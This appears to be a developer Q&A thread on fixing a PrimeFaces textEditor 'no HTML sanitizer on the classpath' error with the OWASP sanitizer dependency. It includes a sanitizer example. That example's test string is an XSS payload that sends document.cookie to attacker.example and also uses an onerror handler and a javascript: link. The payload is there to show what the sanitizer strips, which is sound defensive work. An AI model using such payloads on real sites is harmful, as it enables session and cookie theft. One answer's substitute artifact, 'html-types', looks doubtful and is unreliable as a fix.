TextEditor component is marked secure='true' but no HTML sanitizer is found on the classpath

Error message:

TextEditor component is marked secure='true' but no HTML Sanitizer was found on the classpath. Either add the HTML Sanitizer to the classpath per the documentation, or mark secure='false' if you would like to use the component without the sanitizer.

This is my pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 
https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>com.jsf</groupId>
<artifactId>showcase</artifactId>
<version>1.0.0</version>
<packaging>war</packaging>

<name>showcase</name>
<url>http://maven.apache.org</url>

<repositories>
<repository>
<id>prime-repo</id>
<name>Prime Repo</name>
<url>http://repository.primefaces.org</url>
</repository>
</repositories>

<dependencies>
<dependency>
<groupId>org.primefaces</groupId>
<artifactId>primefaces</artifactId>
<version>8.0.RC3</version>
</dependency>
<dependency>
<groupId>org.jboss.weld.servlet</groupId>
<artifactId>weld-servlet-shaded</artifactId>
<version>3.1.3.Final</version>
</dependency>
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-web-api</artifactId>
<version>8.0.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.glassfish</groupId>
<artifactId>jakarta.faces</artifactId>
<version>2.3.14</version>
</dependency>
<dependency>
<groupId>jakarta.servlet.jsp.jstl</groupId>
<artifactId>jakarta.servlet.jsp.jstl-api</artifactId>
<version>1.2.7</version>
</dependency>
<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<version>1.18.10</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>4.1.1</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>4.1.1</version>
</dependency>
<dependency>
<groupId>com.lowagie</groupId>
<artifactId>itext</artifactId>
<version>2.1.7</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.8.1</version>
<configuration>
<encoding>UTF-8</encoding>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>3.2.3</version>
<configuration>
<filteringDeploymentDescriptors>true</filteringDeploymentDescriptors>
</configuration>
</plugin>
</plugins>
</build>
</project>

textEditor.xhtml:

<html   xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:p="http://primefaces.org/ui">

<h:head>
<h:outputStylesheet name="primeicons/primeicons.css" library="primefaces"/>
</h:head>

<h:body>
<h:form>    
<h3 style="margin-top:0">Basic</h3>
<p:textEditor widgetVar="editor1" value="#{editorView.text}" height="300" style="margin-bottom:10px"/>

<p:commandButton value="Submit" update="display" oncomplete="PF('dlg').show()" icon="pi pi-save" />
<p:commandButton value="Clear" type="button" onclick="PF('editor1').clear();" icon="pi pi-times" />

<h3 class="first">Custom Toolbar</h3>
<p:textEditor widgetVar="editor2" value="#{editorView.text2}" height="300" style="margin-bottom:10px" placeholder="Enter your content">
<f:facet name="toolbar">
<span class="ql-formats">
<button class="ql-bold"></button>
<button class="ql-italic"></button>
<button class="ql-underline"></button>
<button class="ql-strike"></button>
</span>
<span class="ql-formats">
<select class="ql-font"></select>
<select class="ql-size"></select>
</span>
</f:facet>
</p:textEditor>

<p:commandButton value="Submit" update="display" oncomplete="PF('dlg').show()" icon="pi pi-save" />
<p:commandButton value="Clear" type="button" onclick="PF('editor2').clear();" icon="pi pi-times" />

<p:dialog header="Content" widgetVar="dlg" showEffect="fade" hideEffect="fade">
<p:outputPanel id="display">
<h3 style="margin-top:0">Basic</h3>
<h:outputText value="#{editorView.text}" escape="false" />

<h3>Custom</h3>
<h:outputText value="#{editorView.text2}" escape="false" />
</p:outputPanel>
</p:dialog>     
</h:form>
</h:body>
</html>

EditorView.java:

package com.jsf.showcase.view.input;
import javax.enterprise.context.RequestScoped;
import javax.inject.Named;
import lombok.Getter;
import lombok.Setter;
@Getter @Setter
@Named
@RequestScoped
public class EditorView {
private String text;
private String text2;
}

PrimeFaces version: 8

I solved this with this dependency. Thanks Kukeltje.

<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>owasp-java-html-sanitizer</artifactId>
<version>20191001.1</version>
</dependency>

Related to Mario's answer: that dependency is currently not available. I used the following dependency instead, and it also works fine:

<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>html-types</artifactId>
<version>20200713.1</version>
</dependency>

According to the documentation, the textEditor element has its secure attribute set to true by default. This is because the text editor needs to be protected against XSS attacks (you do not want an attacker to write malicious code in the editor that is then executed in other users' browsers):

https://owasp.org/www-community/attacks/xss/

That is why you not only need to use the owasp-java-html-sanitizer dependency, but also need to keep it up to date in case a vulnerability is found in it:

https://search.maven.org/artifact/com.googlecode.owasp-java-html-sanitizer/owasp-java-html-sanitizer
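To make the XSS point concrete, here is an added example (not code from the question, the answers, PrimeFaces or the OWASP project) of what an HTML sanitizer does to editor output before it is re-rendered with escape="false", as the dialog in the question's textEditor.xhtml does. It assumes the owasp-java-html-sanitizer artifact from the accepted answer is on the classpath. The policy below is this example's own allow-list and is not the policy PrimeFaces applies internally; the class and method names and the hostile input are constructed for illustration.

```java
import java.util.regex.Pattern;

import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;
import org.owasp.html.Sanitizers;

/**
 * Added example, not PrimeFaces or OWASP project code: an allow-list policy
 * for rich-text editor output, applied before the HTML is rendered back to
 * other users with escape="false".
 */
public class EditorSanitizerDemo {

    // Allow-list: inline formatting, block elements, http(s)/mailto links,
    // inline style, and the "ql-*" classes the Quill toolbar emits.
    // Everything else (script, iframe, on* handlers, javascript: URLs) is dropped.
    static final PolicyFactory EDITOR_POLICY = Sanitizers.FORMATTING
            .and(Sanitizers.BLOCKS)
            .and(Sanitizers.LINKS)
            .and(Sanitizers.STYLES)
            .and(new HtmlPolicyBuilder()
                    .allowElements("p", "span")
                    .allowAttributes("class")
                        .matching(Pattern.compile("(ql-[a-z0-9-]+\\s*)+"))
                        .onElements("p", "span")
                    .toFactory());

    /**
     * A probe of the same kind the error message in the question implies:
     * can the sanitizer's entry class be loaded at all? (Assumed to mirror
     * the component's check; the exact PrimeFaces internals are not shown here.)
     */
    public static boolean sanitizerOnClasspath() {
        try {
            Class.forName("org.owasp.html.PolicyFactory");
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }

    /** Sanitize editor output; null becomes an empty string so the view never renders null HTML. */
    public static String sanitize(String editorHtml) {
        return editorHtml == null ? "" : EDITOR_POLICY.sanitize(editorHtml);
    }

    public static void main(String[] args) {
        // Constructed hostile submission. The custom toolbar in the question only
        // limits what the widget produces in the browser; a crafted POST body can
        // send any markup to the backing bean, so the server side must sanitize.
        String hostile = "<p class=\"ql-align-center\">Hello <strong>world</strong>"
                + "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
                + "<img src=\"x\" onerror=\"alert(document.domain)\">"
                + "<a href=\"javascript:alert(1)\">click</a></p>";

        System.out.println("sanitizer available: " + sanitizerOnClasspath());
        System.out.println(sanitize(hostile));
        // The output keeps the paragraph, its ql-align-center class and the
        // <strong> text; the script element, the img with its onerror handler
        // and the javascript: link target are removed.
    }
}
```

To confirm the jar really ends up in the WAR rather than just in the POM, run `mvn dependency:tree -Dincludes=com.googlecode.owasp-java-html-sanitizer` and check that it appears with compile (default) scope; a `provided` or `test` scope would leave the component's runtime classpath check failing with the same error.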
